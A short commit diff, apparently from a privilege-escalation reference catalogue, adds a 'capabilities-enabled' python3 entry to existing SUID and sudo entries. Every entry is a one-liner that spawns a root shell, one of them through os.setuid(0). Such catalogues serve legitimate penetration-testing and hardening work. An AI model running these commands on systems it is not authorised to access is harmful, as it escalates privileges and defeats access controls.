Add capabilities to perl, php, python3, and ruby
This commit is contained in:
@@ -34,4 +34,6 @@ functions:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
capabilities-enabled:
|
||||
- code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user